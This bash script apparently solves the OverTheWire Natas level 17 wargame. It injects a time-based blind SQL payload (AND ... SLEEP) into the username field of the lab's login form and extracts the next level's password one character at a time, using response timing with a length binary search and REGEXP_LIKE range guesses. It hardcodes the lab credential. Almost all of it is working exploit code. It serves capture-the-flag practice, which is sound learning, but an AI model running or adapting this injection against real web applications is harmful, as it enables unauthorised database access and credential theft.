#!/usr/bin/env bash

USERNAME="natas17"
PASSWORD="EqjHJbo7LFNb8vwhHb9s75hokh5TF0OC"
TARGET="natas18"

DELAY=4
PREFIX="5mxv8BZZVSMzzYPcY95M9m"

req() {
  CMD=$@
  curl "http://$USERNAME.natas.labs.overthewire.org/index.php" \
       -X POST \
       -u "$USERNAME:$PASSWORD" \
       -d "username=natas18\" AND $CMD AND SLEEP($DELAY) # " \
       -sS &>/dev/null
}

time_req() (
  export STAT
  export CMD="$@"
  (time (req $CMD; STAT=$?)) \
    |& grep real \
    |  awk '{print substr($2, 3, 1)}'
  return $STAT
)

# ie `guess_length "=32"` or `guess_length ">32"`
guess_length() {
  ELAPSED=$(time_req "LENGTH(password)$1")
  return $(( ELAPSED < DELAY ))
}

get_length() {
  echo "[*] Guessing length"
  local MIN=${1:-1}
  local MAX=${2:-100}
  # local PADMAX=${#MAX}
  local FGUESS="%${#MAX}s-%-${#MAX}s"
  while true; do
    printf "[-] Guess: $FGUESS\r" $MIN $MAX
    if [ $((MAX-MIN)) -eq 1 ]; then
      break
    fi;
    
    local MID=$(( (MAX+MIN)/2 ))
    guess_length ">$MID" && MIN=$MID || MAX=$MID
  done
  printf "[+] Found: $FGUESS\n" $MIN $MAX
  return $MAX
}

LOWER="abcdefghijklmnopqrstuvwxyz"
UPPER="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
DIGIT="0123456789"

guess_regex() {
  ELAPSED=$(time_req "REGEXP_LIKE(password, '^$1[a-zA-Z0-9]*\$', 'c')")
  return $(( ELAPSED < DELAY ))
}

exploit_oracle() {
  echo "[@] Forcing oracle exploit"
  local PREFIX=""
  local LENGTH=$1

  while true; do
    if [ "${#PREFIX}" = "$LENGTH" ]; then
      break
    fi
    
    for chars in $LOWER $UPPER $DIGIT; do
      local MIN=1
      local MAX=${#chars}
    
      local RANGE="[${chars:MIN-1:1}-${chars:MAX-1:1}]"
      echo -en "[*] ?? $RANGE\r"
      guess_regex "$PREFIX$RANGE$POSTFIX" || continue
      echo "[+] Found[CHARSET]: $chars"

      local MID=$(( (MAX+MIN)/2 ))
      while true; do
        echo -en "[*] Guess: $RANGE\r"
        if [ $((MAX-MIN)) -eq 1 ]; then
          local NEWCHAR
          if guess_regex "$PREFIX${chars:MIN-1:1}"; then
            NEWCHAR=${chars:MIN-1:1}
          else
            NEWCHAR=${chars:MAX-1:1}
          fi
          PREFIX="$PREFIX$NEWCHAR"
          echo -e "[+] Update: $NEWCHAR -> $PREFIX"
          break
        fi;
    
        MID=$(( (MAX+MIN)/2 ))
        RANGE="[${chars:MIN-1:1}-${chars:MID-1:1}]"
        guess_regex "$PREFIX$RANGE" && MAX=$MID || MIN=$MID
      done
      break
    done
  done
  printf "[+] Found: $FGUESS\n" $MIN $MAX
}

get_length
LENGTH=$?
exploit_oracle "$LENGTH"